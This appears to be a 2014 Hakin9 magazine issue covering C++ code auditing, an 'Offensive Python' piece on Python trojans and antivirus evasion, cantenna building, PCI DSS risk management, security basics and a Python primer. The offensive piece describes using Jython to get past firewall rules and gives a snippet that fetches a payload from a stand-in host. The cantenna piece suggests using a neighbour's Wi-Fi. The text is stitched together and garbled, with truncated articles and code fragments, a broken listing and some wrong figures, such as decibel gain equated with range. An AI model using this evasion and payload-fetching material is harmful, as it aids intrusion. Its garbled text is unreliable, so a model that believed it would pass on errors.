Hakin9 - Practical Protection - Step by Step Guide To Learning Python 2014
Table of Contents

by Mohammed AlAbbadi

Offensive Python
by Kris Kaspersky

Having Fun with Antennas and Why You Need to Make Your Own
by Guillaume Puyo

Evidence Analysis
by Mudit Sethia

Write a Web App and Learn Python. Background and Primer for Tackling the Django Tutorial
by Adam Nelson

Philosophy of Python
by Douglas Camata
Dear Readers,
We would like to introduce a special issue made by Hakin9. This time we will deal
with Python. The articles we published are not only for hackers but will also help
you program in Python. Moreover, we added some articles on C++. You will
learn how to conduct an audit using C++ code analysis. You can compare it with offensive
programming in Python. For sure, after reading our step-by-step tutorials you will become
a professional auditor with must-have knowledge of Python programming. You will get to
know how to analyze source code to find vulnerabilities, which will help you to protect your
websites and applications.
This time you will also find an Extra section with articles about Payment Cards, Hardware Hacking and
Evidence Analysis.
Enjoy reading,
Ewa & Hakin9 Team
DISCLAIMER!
Whilst every effort has been made to ensure the highest quality
of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the contents' usage.
All trademarks presented in the magazine were used for
informative purposes only.
All rights to trademarks presented in the magazine are reserved
by the companies which own them.
Approaches
One very important rule of thumb for code audit and analysis is to take time constraints
into consideration, since we don't have the infinite luxury of time to audit and analyze the code. It is imperative to
understand the product (application) written in the specific language, which in our context is an application
code snippet written in C++, and to have a clearly defined approach such as:
Looking out for the most bugs
Looking out for the easiest to find bugs
Looking out for the weaknesses that are most reliable to exploit
With the above clearly defined, we can now prioritize our efforts. It is very important to limit the approach, since we
won't ever have enough time to find all the bugs.
Methodology
It is essential that we have an understanding of the application. Much of that understanding can come from
automated static analysis tools, which have well-known strengths and weaknesses.

Strengths:

They scale well, can be run on lots of software, and can be run repeatedly.
For things that such tools can find automatically with high confidence, such as buffer overflows, SQL
injection flaws, etc., they are great.

Weaknesses:

Many types of security vulnerabilities are very difficult to find automatically, such as authentication
problems, access control issues, insecure use of cryptography, etc. The current state of the art only allows
such tools to automatically find a relatively small percentage of application security flaws. Tools of this type
are getting better, however.
They produce high numbers of false positives.
They frequently can't find configuration issues, since these are not represented in the code.
It is difficult to prove that an identified security issue is an actual vulnerability.
Many of these tools have difficulty analyzing code that can't be compiled. Analysts frequently can't compile code
because they don't have the right libraries, all the compilation instructions, all the code, etc.
GrammaTech CodeSonar
CodeSonar is a source code analysis tool that performs a whole-program, interprocedural analysis on
C and C++ and identifies programming bugs and security vulnerabilities at compile time. CodeSonar
is used in the Defense/Aerospace, Medical, Industrial Control, Electronics, Telecom/Datacom and
Transportation industries.
Splint
This tool is used to check programs developed in C for security vulnerabilities and coding mistakes.
Flawfinder
Flawfinder works by using a built-in database of well-known C and C++ function problems, such as buffer
overflow risks, format string problems, race conditions, potential shell meta-character dangers, and poor
random number acquisitions.
FindBugs
FindBugs uses static analysis to inspect code written in Java for occurrences of bug patterns and finds real
errors in most Java software.
RATS
RATS, short for Rough Auditing Tool for Security, only performs a rough analysis of an application's source
code. It does not find all errors and may also flag false positives.
ITS4
This is a simple tool that statically scans C and C++ source code for potential security vulnerabilities. ITS4
is also a command-line tool that works across UNIX and Windows platforms by scanning source code and
looking for function calls that are potentially dangerous.
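Tools like Flawfinder, RATS and ITS4 share the same core pattern: a database of well-known risky calls matched against the source text. The following is a minimal sketch of that pattern in Python; the ruleset and messages here are illustrative, not taken from any of these tools.

import re
import sys

# Illustrative database of well-known risky C calls (not any tool's real rules)
RISKY_CALLS = {
    "gets":    "no bounds checking at all; prefer fgets",
    "strcpy":  "unbounded copy; prefer strncpy",
    "strcat":  "unbounded concatenation; prefer strncat",
    "sprintf": "unbounded formatting; prefer snprintf",
    "system":  "shell metacharacter risk",
}

PATTERN = re.compile(r"\b(%s)\s*\(" % "|".join(RISKY_CALLS))

def scan(path):
    # Flag every line that calls one of the risky functions
    with open(path) as src:
        for lineno, line in enumerate(src, 1):
            for match in PATTERN.finditer(line):
                name = match.group(1)
                print "%s:%d: %s() - %s" % (path, lineno, name, RISKY_CALLS[name])

if __name__ == "__main__":
    for path in sys.argv[1:]:
        scan(path)

Run against a C file (python scan.py vulnerable.c), it prints one warning per risky call; real tools add parsing and data flow analysis on top of this naive text match, which is exactly where their false positives and negatives come from.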
Processing Results
The outcome of code analysis and audit wouldn't be considered useful if the flaws of the application are
not improved upon. The result should therefore provide recommendations on the useful changes
that need to be implemented.
This can only be achieved with complete documentation and accurate triaging.
Documentation should include pointers to the flawed code, an explanation of the problem, and justification for
why this is a vulnerability. Adding recommendations for a fix is a useful practice, but selecting and preparing
the actual solution is the responsibility of the code owners.
The triaging process depends on the severity of the security bug and also on an understanding of the priorities. If
the severity is high, then immediate attention should be given to fixing it.
Conclusion
C++ code analysis and audit provides useful information on security vulnerabilities and recommendations
for redesign. It also provides an opportunity for organizational awareness, which improves effectiveness
and helps to prioritize efforts.
Automated security tools are able to identify many errors quickly, but some vulnerabilities will be missed. Manual
analysis shouldn't be a replacement for these tried and tested tools, but it can be advantageously integrated
with them.
Figure 1. Superman
Though it used to be a dream as a child, today it is a reality; not only for me but for all of us (at least, the
vigilante wannabes). Now, hold your horses; this is neither another scientific breakthrough about a new
technology that perhaps can be integrated with Google Glass (I wish it were), nor a limitless magical pill
that mutates your eye structure. It is simply the ability to scan the core of almost all objects around us to
find their vulnerabilities and correct them ahead of time, before someone else finds and exploits them.
Did I say the core?!! Ooh, I meant the code. Confused yet? Let me explain [1].
Most systems today are computerized (hint: the car mentioned above) and therefore they are basically pieces
of code. This so-called code is developed by programmers in different programming languages (such as
Java, .NET, C++, etc.) and may include weaknesses or vulnerabilities that allow people, like me as a child, to
abuse them (hint: injecting code into the car to change its behavior). On the other hand, sometimes you may
Where to start?
The idea is to use a tool to automatically detect all security flaws and recommend corrections. There are
different types of tools that can be used in different situations. If the source code is available, then static code
analysis tools are used to detect flaws. Otherwise, debuggers/disassemblers can be used to reverse engineer
the compiled code and identify buffer overflows. Fuzzing techniques and tools can be used to provide
random or invalid data input to applications and observe their behavior. Having said all of that, a simple text
editor like Notepad is sufficient to manually review the code, but it takes more time, effort and knowledge. In
Table 1, you'll find examples of famous static code analysis tools [2].
  char A[8], B[8];
  std::cin >> A;  // reads a word with no bounds check
  return 0;
}

The problem with the above code is that when the program asks the user to enter a word, it doesn't check the
array boundaries. Though A is of 8-character size, entering a 9-character word such as "excessive" as
input will overflow the allocated 8-character A buffer and overwrite the adjacent B buffer with the trailing "e" character and
the null character.
Buffer overflows come in many types: stack based and heap based are two of them, and they fall under, but are not
limited to, one or more of the following categories:
Boundary Checking (like the example above)
String format
Constructors & Destructors
Use-after-free
Type confusion
Reference pointer
The objective of this article is not to explore all types of buffer overflows and code review techniques, but rather
to give an overview of the whole process.
Detection/identification tools
There are many static code analysis tools, some of which are commercial, such as IBM AppScan Source Edition
and HP Fortify Static Code Analyzer, and some of which are academic/free/open source, such as Flawfinder,
Clang Static Analyzer and Cppcheck. Below is a snapshot of Cppcheck in progress. Notice that more than
3,000 code files were analyzed in under one minute (Figure 3).
The next snapshot shows the results of the analysis (Figure 4).
Targeted at both the development community and the community of security practitioners, Common
Weakness Enumeration (CWE) is "a formal list or dictionary of common software weaknesses that can
occur in software's architecture, design, code or implementation that can lead to exploitable security
vulnerabilities" [2]. According to CWE 805, titled "Buffer Access with Incorrect Length Value", "the
software uses a sequential operation to read or write a buffer, but it uses an incorrect length value" (look at
the figure below) "that causes it to access memory that is outside the bounds of the buffer" [6].
And the solution lies in pointing to a sufficiently large buffer, as illustrated in Figure 6.
Risk mitigation
There are four risk mitigation strategies: avoid the risk, reduce the risk, transfer the risk or accept the risk.
The overall risk can be avoided by not releasing or developing such software, or perhaps by using a type-safe
language in the first place. For the sake of the argument, avoiding, transferring and accepting the risk will not
be discussed here. As for risk reduction, it can be done by reducing the vulnerability values, the number of
vulnerabilities or the likelihood of the security risks occurring. Below is a list of suggested controls that can
be implemented to reduce the risk of buffer overflows:
Using safer compilers
Disabling the stack execution
Preventing return addresses from being overwritten
Reducing the amount of code that runs with root privileges
Avoiding the use of unsafe functions such as strcpy(), gets(), etc.
References
[1] http://c85c7a.medialib.glogster.com/media
[2] http://www.embedded.com/design/other/4006735/Integrate-static-analysis-into-a-software-development-process
[3] http://www.redhatz.org/page.php?id=22
[4] http://samate.nist.gov/Main_Page.html
[5] http://cwe.mitre.org/about/faq.html#A.1
[6] http://cwe.mitre.org/data/definitions/805.html
[7] http://www.embedded.com/design/other/4006735/Integrate-static-analysis-into-a-software-development-process
Offensive Python
by Kris Kaspersky
Python was created for fun, but evil hackers use it for profit. Why is Python a new threat to the
security industry, and just how tricky are Lucifer's kids? Let's talk about it.
According to Wikipedia: "Python is a widely used general-purpose, high-level programming language. Its design
philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of
code than would be possible in languages such as C."
The first statement would surprise a Windows user (how many victims have Python preinstalled?), but
MacBooks and Linux servers are a different story. Python ships by default and is required by many
programs, so uninstalling Python is not an option.
Python is a natural choice for hackers targeting Mac OS X and Linux, because it's cross platform, unlike binary
files it does not require permission for execution, and it's absolutely not readable from an antivirus perspective, so
the second statement in Wikipedia is wrong too.
MacOSX/Flasfa.A
This is a good example: a simple Trojan, neither obfuscated nor encrypted. Only 16 out of 42 anti-virus engines
detect it (link to VirusTotal: http://goo.gl/gOCXCh). Why am I not surprised? Because it's very hard to detect
Python scripts by signatures. Scripts are different from binary files generated by a compiler. The same logic
(say, a = b + c) could be represented in an (almost) infinite number of ways. The variables may be stored
in different registers or different local variables, and these variables could be addressed via different base
registers. In short, the binary representation of a = b + c is not the best signature, but it will work,
generating relatively low numbers of false positives.
Ah, don't get me started on these nasty false positives: a real pain in the ass! Software vendors are upset and pissed
off, because if at least one antivirus triggers on a file, an average user will not take the risk of installing it. Vendors
complain and sometimes it comes to a court case, because the vendor loses money. Nobody wins the case (as
far as I know), but the antivirus company loses money too, especially if its antivirus becomes too annoying and
users choose the antivirus that whispers "All Quiet in Baghdad".
In my experience, the TOP 10 anti-viruses detect less than 30% of malicious files at the moment of the first wave of
infection. The detection rate slowly grows over the next 10 days. After 10 days, the given antivirus either
detects the disease or fails (because of limitations of the engine, or because the company has no sample).
What else do you expect, dude? You do need a sample to write a signature for it. Period. Somebody somehow
has to realize that he or she is infected, find the malicious file and send it to his or her favorite antivirus
company. It takes time. Yeah, I know about heuristics and emulation, but... unfortunately nobody has created an
emulator for Python yet. Why? The answer is simple. The relatively low number of Python Trojans creates no
business value for it, but it would require a lot of money and human resources.
Welcome to the real world, dude. Forget the marketing bullshit. Antivirus companies focus on detecting the
biggest problems to prevent outbreaks. Generally speaking, an antivirus does not prevent infection. An
antivirus stops massive diseases. To fight Python, antivirus companies would have to write thousands of lines of
code and create collections of good scripts to check for false positives. Like they have nothing better to do. However,
sooner or later it will be done, and then...
Coffee break
Java is the most vulnerable platform and target number one for hackers. The classic hit: download-n-execute.
When an HTTP request has a Java agent field and the HTTP response is an executable file or a Python script,
we're under attack. A few simple firewall rules can block up to 90% of these attacks. How to bypass them?
Grab your mug and make some mocha. Jython (http://www.jython.org/) is an implementation of Python
which is designed to run on the Java Platform. It consists of a compiler that compiles Python source code down
to Java bytecodes which can run directly on a JVM, a set of support libraries which are used by the compiled
Java bytecodes, and extra support to make it trivial to use Java packages from within Jython.
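To see why this matters to an attacker, consider a minimal sketch of the idea (my own illustration, not a sample from the wild): plain Python source, but the network I/O goes through the Java standard library, so on the wire and inside the JVM it looks like Java.

# Runs under Jython: Python syntax, Java plumbing
from java.net import URL

conn = URL("http://example.com/payload.py").openConnection()
stream = conn.getInputStream()

data = []
byte = stream.read()              # java.io.InputStream.read(): one byte, -1 at EOF
while byte != -1:
    data.append(chr(byte))
    byte = stream.read()
stream.close()

print "fetched %d bytes through the JVM" % len(data)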
It's a good idea, but a bad implementation. Java decompilers generate endless spaghetti, giving you a
headache and suicidal thoughts. Time comes and goes and you are trying to unravel the tangle. The day
is gone. Finally you realize that the decompiled code is wrong and something is missing. To confirm this
theory you use Java disassemblers.
Wow! The cycle that changed the variable which was never initialized before and never used after: it's
not the hacker's bug, it's the decompiler's bug. Jython code is too messy, and it's different from what the native Java
compiler produces. Using Java disassemblers would be an option, but it's time to go home and say goodbye.
Even if you are brave enough to reconstruct the logic, it does not help you write a good signature,
because you need special experience to distinguish library code from the hacker's code.
Fun to imagine
If you take a wire and plug it into a DC generator, the wire will emit a small electromagnetic field; if this
wire is coiled, the field will be stronger; if it is coiled around an iron core, it will become an electromagnet.
What's important is that Faraday discovered that if a current goes through a coil and there is another coil
nearby, increasing the current in the first coil will induce a change in the second one across the air.
This electromagnetism propagates through the air and, as it travels, loses power, reflects, refracts, scatters and
diffracts, and that's not even counting the potential interferences.
The problem with using DC is that to continually induce, we'd have to continually increase the current, which
would become problematic at some point, and this is why we need to use AC. While in DC the electrons move
steadily in the same direction, in AC they do this weird dance where they take two steps forward and then
two steps backwards, two steps forward again, and the chain repeats itself. Imagine yourself on a rowing
machine: every time you pull, you create a peak of energy over time, but while you're coming back and
preparing to pull again, this energy diminishes. The number of times you pull each second would be the
frequency, and if there were a receiving coil next to the rower, the changes happening in the rower would be
induced in the coil and the signal received would look like a sine function: this is our carrier wave, and the magic
can finally happen.
When we divide the speed of light by the frequency, we get the wavelength. That's the famous λ = c/f
formula, with λ the wavelength in meters, c the speed of light in m/s and f the frequency in Hz. To be precise,
we'd use 95% of c, which is the speed of the electricity in a wire.
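As a quick worked example (my numbers, using the 2.4 GHz Wi-Fi band that the cantenna at the end of this article targets):

c = 299792458.0                                       # speed of light, m/s
f = 2.4e9                                             # 2.4 GHz, in Hz
print "free space: %.1f cm" % (c / f * 100)           # ~12.5 cm
print "in a wire:  %.1f cm" % (0.95 * c / f * 100)    # ~11.9 cm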
Let's get back to our antennas. Earlier we said we needed a coil on the receiving end; that's not entirely
true. Let's say we don't care much about receiving the current at the same voltage, but we'd very much
like to get the information of the signal, such as its frequency or the information it carries. To do that we
don't really need the whole package, so we don't really need a coil: a bit of straight wire will allow us
to receive this information, although it will be much, much weaker than if we had put a coil right next to
the emitter. It doesn't matter, we just need to amplify this weak signal again in our receiver. This bit of
straight wire is our antenna.
Figure 2. A simple sin(0–2π) graph
Antenna impedance
A very short word on antenna impedance: the impedance is the amount of resistance the antenna is going to
present to the current it will receive; it relates the current and the voltage that go through it, so it's a very
important value. When you buy an antenna on the market, the impedance will have been matched to 50 ohms
by the manufacturer. This is why you can't just add some length to any antenna: it's unlikely to work,
because extending your antenna by soldering more metal onto it (even if you keep using multiples of the wavelength) is going
to add some impedance to it, and unless you match it again you are going to de-tune it.
Radiation pattern
There are many types of antennas, and as many radiation patterns. Let's have a look at the most important ones:
The isotropic antenna is an idealistic lossless antenna that radiates with the same power in every direction. In
Figure 3 you can see it as a circle, but we have to keep in mind that we live in a three-dimensional world, so
the isotropic antenna radiation pattern really looks like a perfect sphere. These antennas don't really exist as
such, but we could consider celestial radiators like stars as isotropic emitters.
The Yagi-Uda antenna is a very popular design, and you probably use one for your TV. It uses several
elements (driven, reflector, director) and is the most widely used directional antenna. As you can see in
Figure 4, the pattern is much longer and narrower. In fact, you simply sacrifice some omnidirectionality so that
your antenna will reach further in one direction. In the pattern we can see that the antenna emits on the right
but also a little on the left: there are two lobes, the main one being the directional one on the right.
An omnidirectional antenna radiation pattern will look very much like the isotropic one in two dimensions,
but in 3D it will look more like a donut than a sphere.
Antenna Gain
We've all seen expensive so-called "high-gain" antennas on the market, but what does that really mean?
The gain is the ratio between the power emitted by the antenna in its main lobe and what an isotropic antenna
would radiate in that same direction; the gain is usually measured in units called decibels-isotropic (dBi). A little
word of warning here: the decibel is a logarithmic unit, which means that when a manufacturer displays a gain
of 3 dB, they are claiming to double the range of your antenna. The problem is, sometimes they display much
more than that, and when you start seeing +9 dBi antennas (8 times the range) with the same power level, without
any amplification mechanism on the antenna, you can start smiling. This gain measurement is criticized: a lot of
people think it is not realistic to compare an antenna to an isotropic one, since it can't possibly exist. To have a more
realistic approach, the gain can be measured in dBd, which is the ratio between the power emitted in the antenna's
main lobe and what a dipole antenna would radiate in that same direction.
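Since the decibel trips so many people up, here is the conversion spelled out (a quick illustration of the logarithmic scale, not anything vendor-specific):

def dbi_to_power_ratio(gain_dbi):
    # every 3 dB is roughly a doubling of the power ratio
    return 10 ** (gain_dbi / 10.0)

for gain in (3, 6, 9):
    print "%d dBi -> %.1f times an isotropic radiator" % (gain, dbi_to_power_ratio(gain))
# prints 2.0, 4.0 and 7.9 times respectively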
What's important is that the gain is the amount of omnidirectionality you sacrifice to gain directionality
at the same emitter power level. The way to achieve this is by having longer antennas: remember earlier
when we talked about wavelengths? Well, having a longer antenna is going to achieve a higher gain. There will
obviously be no impact for the isotropic antenna, since its gain is always 1; a higher gain Yagi-Uda will have
a narrower main lobe which will reach further; the omnidirectional antenna will look a little more like
a disc and less like a donut. In shorter terms, your antenna will reach further, but you will have to aim better
towards the destination.
This is it, we're done with antenna theory. We know all we need to know to understand how antennas
work, in a superficial but, for now, sufficient way.
Radiotelescopes
It might be a little bit counterintuitive to point an antenna towards the sky and expect to see something;
however, by analyzing the values received, we can know what's out there.
Sonic Weapons
These weapons have become quite popular these last few years because they are non-lethal and less expensive
than conventional weapons in the long run.
You have probably heard of the Long Range Acoustic Device (LRAD), which is a way of sending sounds across
large distances. These are used on boats, and the principle is sound (pun intended): they are meant to be so loud
that you stop whatever you're doing and try to get far away before your eardrums give up.
The Active Denial System is like a science fiction weapon: it projects an energy beam that excites the water
molecules at the surface of its target, like a microwave oven does, and when this target is your skin it can't
possibly go well. In practice it causes you to flee, because the burning sensation disappears as soon as you get
out of the beam, so this is still a non-lethal weapon.
TeraHertz imaging
This is the infamous tech used by the TSA in US airports that sees through clothes. In practice it uses
wavelengths at the border of infrared and microwaves, 100 µm to 1 mm; the challenge here is to have
sufficiently small antennas.
That's not all there is, because once we overcome the challenge of having ridiculously small antennas,
we'll be able to communicate at extremely high frequencies (over 300 GHz), and since the antennas will be
at the nanometer scale, we can just imagine the MIMO arrays we're going to have with a million antennas
in our cellphones.
Now for the fun part: we are going to build a WiFi directional antenna.
Building a Cantenna
There is no mystery here: a cantenna is an antenna made of a can, or of multiple cans.
There are many advantages to building a directional WiFi antenna. First of all, it's very cheap to build,
whereas it's very expensive to buy, and there's a reason for that: there is usually very little use in having a
directional WiFi antenna at home (modems and access points are equipped with omnidirectional antennas).
The other reasons are less obvious: for example, you might need to connect to your neighbour's
connection for some reason and would need better reception; another reason to have a directional antenna
might be to use it while driving, to verify that the houses along the road secured their WiFi
properly (and to alert them if they didn't). The last reason is that it's fun: you'll enjoy yourself while doing it
and you'll feel like learning more about antennas; maybe the next step will be to build a Yagi-Uda array (plus, a
cantenna looks cool, like a radar).
Here's a little disclaimer:
If you're missing something, if your can diameter is a little too small or a little too big, it doesn't matter: do
it anyway, learn, and experiment.
If you tinker a little bit, you should already have a lot of the hardware required, except the antenna components,
which shouldn't exceed $10. If you don't have all the tools, ask a friend, buy them or find another way; be
resourceful.
When using anything that is either fast, hot or noisy, protect yourself: get protective glasses, some gloves
and a mask. Please remember that you only have one set of eyes/hands/ears and that it only takes one
mistake to lose them. Don't be a hero, get some protection.
You're not building the ultimate antenna; this is a project for learning and having fun with tin cans! Don't
be hard on yourself: if you have fun, you'll be building another, better antenna in no time.
You'll obviously need a can to do this, so go and buy one. The diameter should be around 8.25 cm, and the can as long as
you can find: where I live there are a lot of cans smaller than this and a lot of bigger cans, and the
middle type is rarer; the one I found was for sliced pineapple.
What we'll use the can for is called a waveguide. It's not the antenna per se; it's a device that allows the
waves to travel in a predetermined fashion. In short, it guides the waves to the real antenna (hence the name).
Figure 7. A can of sliced pineapple: 8.25cm diameter and as long as I could find
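To get a feel for the dimensions involved, here is the usual circular-waveguide math behind cantenna calculators (a sketch using the standard TE11 formulas; the diameter is the one above, the channel choice is mine):

import math

c = 299792458.0
f = 2.437e9                        # Wi-Fi channel 6, Hz
free = c / f                       # free-space wavelength, ~12.3 cm

d = 0.0825                         # can diameter, 8.25 cm
cutoff = 1.706 * d                 # TE11 cutoff wavelength of a circular guide
guide = free / math.sqrt(1 - (free / cutoff) ** 2)

print "probe length: %.1f cm" % (free / 4 * 100)                       # ~3.1 cm
print "probe offset: %.1f cm from the closed end" % (guide / 4 * 100)  # ~6.3 cm

The probe is the quarter-wave wire soldered to the connector described below; the offset tells you where along the can to drill the hole for it.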
Figure 8. An N-type female chassis-mount connector on the left and its BNC equivalent on the right
Use a drill or a nail and a file to make holes big enough for the connector on your can:
The rest is up to you: mount it on a small stand (which should be cheap), lengthen the waveguide by adding
another can, paint it, put stickers on it, name it, etc.
The last thing you'll need is a pigtail: a cable to connect your antenna to whatever you want to plug it
into. That cable should be a coaxial cable with a male N-type connector on one end (to plug it into your access
point, for example), and the other end should match the female chassis-mount connector you used on the can.
Summary
This is it, people: in a short time we not only learned about antenna theory, but we created our own antenna.
If you had fun, it might be a good start for you: since you already own all of the pieces, you can experiment
with different sizes and try things; just change the can!
It might also be a good introduction to building a Yagi-Uda array. In any case, if you wish to learn more
about all this, I can't encourage you enough to spend some time on ham radio amateurs' blogs. It was fun
sharing all of this with you; I'm usually quite busy and I don't do this nearly as often as I should. Thank you
for reading.
PCI DSS is meant to apply to all entities that transmit, process or store cardholder data (CHD). It provides technical and
operational requirements for merchants, acquirers, issuers and service providers as well. A service provider is
not a payment brand, but it may impact the security of CHD, such as service providers that provide IDS, IPS or
firewalls. They also store, process or transmit cardholder information on behalf of clients, merchants or other
service providers. We consider as CHD the Primary Account Number (PAN), expiration date, service code and
cardholder name. Sensitive authentication data consists of the card verification values (CAV2/CVC2/
CVV2/CID), PINs and PIN blocks, and full track data (Track 1 and Track 2). The difference between general
CHD and sensitive CHD is the fact that sensitive data should never be stored after authorisation, even in an
encrypted form.
Basically, card companies hold acquiring banks responsible for complying with PCI DSS, and these acquirers
ensure compliance with the standard via merchants. In the end, merchants must comply with this
standard to protect users' personal data that is being stored, processed and transferred. Essentially,
the standard is an agreement between payment card companies, merchants' banks and the merchants.
According to the standard, organisations must adhere to twelve PCI requirements grouped under six control objectives, which
are shown in the table below. Therefore, PCI DSS consultancy is required in order to understand the
processes, procedures and IT technologies that are needed by the business to achieve compliance with it.
However, as explained in the next paragraphs, most of the time compliance does not guarantee security
of information within an organisation.
3. Maintain a Vulnerability Management Program
R5: Use and regularly update anti-virus software
R6: Develop and maintain secure systems and applications
4. Implement Strong Access Control Measures
R7: Restrict access to cardholder data by business need-to-know
R8: Assign a unique ID to each person with computer access
R9: Restrict physical access to cardholder data
5. Regularly Monitor and Test Networks
R10: Track and monitor all access to network resources and cardholder data
R11: Regularly test security systems and processes
assurance that your organisation keeps controls cost-effective and proportionate to the risks. Firms need both
compliance with PCI DSS to protect CHD and RM to secure the business and manage the risks that
security breaches pose to all critical information.
RM provides alignment between the business and information security that suits the culture and requirements of
your business, involving the stakeholders in critical and costly decisions. Sometimes organisations prefer to
implement only isolated security practices; these are no substitute for RM and do not provide 100% security. This
happens because most firms deal with technology assets and operations on a daily basis, hence a true RM
program must be followed across all sectors. As shown in Figure 1, there are three steps that must be followed to
provide compliance with PCI DSS. However, if we think of the RM needed to manage information in general, it
is based on the following six activities (Figure 2):
Asset Identification
Business Impact Assessment
Control Assessment / Gap Analysis
Risk assessment
Risk Treatment
Implement agreed Risk Treatment controls and measurements
Impact level      Financial Impact       Legal Impact                                   Reputation Damage
No Impact         No financial impact    None                                           None
Minor Impact      None                   Some impact
Serious Impact                           Breach of laws, regulations or contract        Multiple customers and businesses
                                         leading to litigation or prosecution & fines   aware, local media coverage
Perform a Gap Analysis or Control Assessment to identify gaps that may exist and improve on them. It is a
way to compare current controls and practices, helping you find any gaps and areas that suffer from threats,
and to mitigate the security risks. Decide whether the implemented controls are acceptable to mitigate the
risk, and evaluate the risk.
Employ Risk Assessment, which calculates the risk value to estimate its significance.
What is the risk?
Risk is the potential that a given threat will exploit vulnerabilities of an asset and hence cause harm
to the organisation (financial, legal or reputation impact). As a generic process, you walk around with
the employees, interviewing them, and look at what could reasonably cause harm, to find any weaknesses
and eventually evaluate the risk. Using the information gathered from the control assessment and the
interviews with colleagues and interested parties, the risk assessment identifies risks and
vulnerabilities. The risk value is calculated by multiplying the impact value of the asset by the likelihood
of the risk happening and by the threat level. Likelihood refers to the probability of a threat exploiting
a vulnerability.
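As a toy illustration of that multiplication (the scales and ratings here are invented for the example, not prescribed by PCI DSS):

# rate each factor on a 1-5 scale for a given asset
impact = 4        # serious impact if the asset is compromised
likelihood = 2    # unlikely within the review period
threat = 3        # moderate threat level

risk_value = impact * likelihood * threat
print "risk value:", risk_value    # 24, on a scale of 1 to 125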
It is possible that there will be a security breach within the next three years.
It is unlikely that there will be a security breach within the next three years.
A security breach will not occur within the next three years.
Last but not least is the planning and implementation of the risk treatment process. This process depends
on the risk value and takes place once the risk has been identified and measured properly. If
the risk falls within the fault tolerance, the team may decide to accept the risk. When the impact is too high
and the threat occurs frequently, the business should simply not implement the specific actions, and thus
avoid the risk. The selected team can also transfer/share the risk in order to reduce the burden of
loss in the event it occurs. The major considerations arise when you need to reduce security
risks; the appropriate level of management then needs to approve appropriate countermeasures. As
a result, risk treatment leads us to determine the appropriate controls for reducing the risk, the impact of
potential threats and the likelihood of a threat taking advantage of a vulnerable asset.
Following the previous steps at least annually gives the management team a clear vision of how the business
is coordinated with information security in mind. It also keeps them up to date when changes happen
in critical operations and services, and shows how to control any vulnerabilities related to PCI DSS and other
information. Risk assessment helps organisations meet the requirements of PCI DSS and find additional
controls to reduce risks rather than bypass them.
RM in alignment with PCI DSS requirements is a guide for organisations on how to effectively apply the above
principles in order to manage the security risks identified without increasing security risk. It supports the business
process and helps to engender and maintain customer trust in a business process or service, by ensuring that
the customer receives a consistent service and that the quality of the service is preserved. Essential for the business
is the fact that RM must be continuous, at regular intervals, to help organisations deal with and mitigate significant
threats, vulnerabilities and risks in an effective manner.
Therefore, as highlighted in the previous paragraphs, organisations must obviously be fully aware of the
information they are dealing with and be able to protect all of it. PCI DSS only protects CHD, and all
the other data is exposed to critical threats. As a result, we introduced the term RM, its steps, its critical
aspects and its benefits.
Conclusion
The purpose of this article was to present PCI DSS and the requirements that organisations must satisfy in
order to protect CHD from security breaches. However, there exists information that differs from CHD, and
organisations must also consider alternative solutions to provide and manage security related to those kinds
of data. Therefore, we demonstrated the ongoing process, namely Risk Management, which must be followed
by organisations to provide an additional level of security to their assets regarding CIA. This process helps
organisations to understand the impact when assets are compromised and to estimate the risk value depending on
the threat level, the likelihood and the impact. By evaluating the risks, organisations are also able to address
security issues in an effective manner and put in place appropriate controls and measurements to secure critical
operations and assets.
Evidence Analysis
by Mudit Sethia
Welcome back to the novice approach to Evidence Analysis!! By putting the title as one
of a novice, I really mean it to be novice: simple, straight and as it is. There can be no
alteration done to the elementary alphabet ABCD... Agreed?? (btw, I know the other 22
letters as well ;))
So let's get back to some serious elements of Information Security from where we bid it goodbye!!!
We get back to the three fundamental arms of Information Security, the CIA triad, and also to the other two
arms that came along as Information Security grew older!!!
So we have these five arms of Information Security:
Confidentiality
Integrity
Availability
Authenticity
Non Repudiation
Let us see, with an example, how a measure that guarantees the security of information or data achieves these
fundamentals.
Mr. A signs a contract with Mr. B. Mr. A sends the requested details via e-mail to Mr. B by digitally signing
the document and encrypting the mail. (Here I have assumed the encryption to be of the public-key type, where
one key is used to encrypt the message and a different, paired key is used to decrypt it.)
Confidentiality
When a document is encrypted, it can be decrypted only with possession of the key that is meant to decrypt it. So the message remains confidential en route, hidden from anyone unintended.
Integrity
Integrity means that the data or information should not be modifiable in a manner that cannot be detected,
by any means that is unauthorized. Now, it is interesting that a slight change in the document
will completely change the whole encrypted message (skipping details for the benefit of your heads and
Google!!!). That way it achieves integrity.
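You can see this avalanche effect for yourself with a hash function (a stand-in here for the details being skipped; the messages are made up):

import hashlib

# one character differs, yet the two digests share nothing recognisable
print hashlib.sha256("Pay Mr. B $100").hexdigest()
print hashlib.sha256("Pay Mr. B $900").hexdigest()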
Availability
The message remains available to both Mr. A and Mr. B (unless their storage space runs out or the deal ends up in
legal offices with the messages being shredded).
Authenticity
The message remains authentic as it has been signed with Mr. A's digital signature, which is unique to him.
Also, the key that is used to encrypt the message is unique (however, a better idea is always to use private-key encryption).
Non-Repudiation
It means... if I killed your senses by making you read this, I will say "Yes" if asked... LOL!!!
It means that Mr. A can't deny the fact that he sent the message to Mr. B. This is accomplished because the message
has been signed by Mr. A using his digital signature, which is unique to him.
In this way, we see how a measure taking care of the security of your information scores a goal at all 5
goal-posts (I will try something other than soccer next time!!!).
P.S.: Technically, people sometimes differentiate between the literal meanings of Data and Information. In real
life, they are mostly used interchangeably: if one of them goes on a vacation from your mind, you use the
other. As simple as that!!!
Now, with this we end the fundamentals and with the next issue we get on to something that gets your CPU
on a run.
Next issue will deal with:
Data Acquisition: A First Responders Approach
The Fundamentals of Digital Cloning
Keep Reading. Be Safe.
Mail me at write2mudit [at] outlook [dot] com.
Python has advanced object-oriented design elements which allow programmers to write large programs.
Python has an inclusive standard library which helps programmers write almost any kind of code,
from industry-standard encryption to 3D graphics.
It can be easily installed in a variety of environments, such as a desktop, a cloud server or handheld devices.
In this article you will learn the basics of Python, such as system requirements, installation, basic
mathematical operations and some examples of writing code in Python. This article is intended to help you
learn to code in Python (Figure 2).
After this, save the file; you can name it hello.py. To open a command prompt in Windows, click the Start button and
type "cmd" in the Run option. Then you need to navigate to the directory where you saved your first program
and type "python hello.py" (without quotes). With this effort, you can find out whether your Python is
installed and working properly or not. You can then start writing more advanced code (Listing 1).
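The file itself can be a single line; a minimal hello.py for the Python 2.x used throughout this issue:

# hello.py - the smallest test that the interpreter works
print "Hello, world!"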
Listing 1. Simple code example of Python

// def insert_powers(numbers, n):
